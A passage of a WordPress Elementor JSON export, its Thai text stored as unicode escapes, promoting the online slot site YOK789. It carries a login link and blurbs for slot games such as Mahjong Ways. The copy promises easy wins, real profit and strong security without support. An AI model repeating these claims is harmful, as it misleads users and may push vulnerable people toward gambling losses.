\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 1 \\u0e1a\\u0e32\\u0e17 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1a\\u0e2d\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32 YOK \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e2a\\u0e48\\u0e2d\\u0e07\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e0a\\u0e35\\u0e27\\u0e34\\u0e15 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e0a\\u0e47\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e15\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e33\\u0e19\\u0e27\\u0e13\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 <strong>\\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong> \\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e0a\\u0e15\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e1a\\u0e2d\\u0e01\\u0e40\\u0e25\\u0e22\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e30\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e23\\u0e27\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e22<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"933afcf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 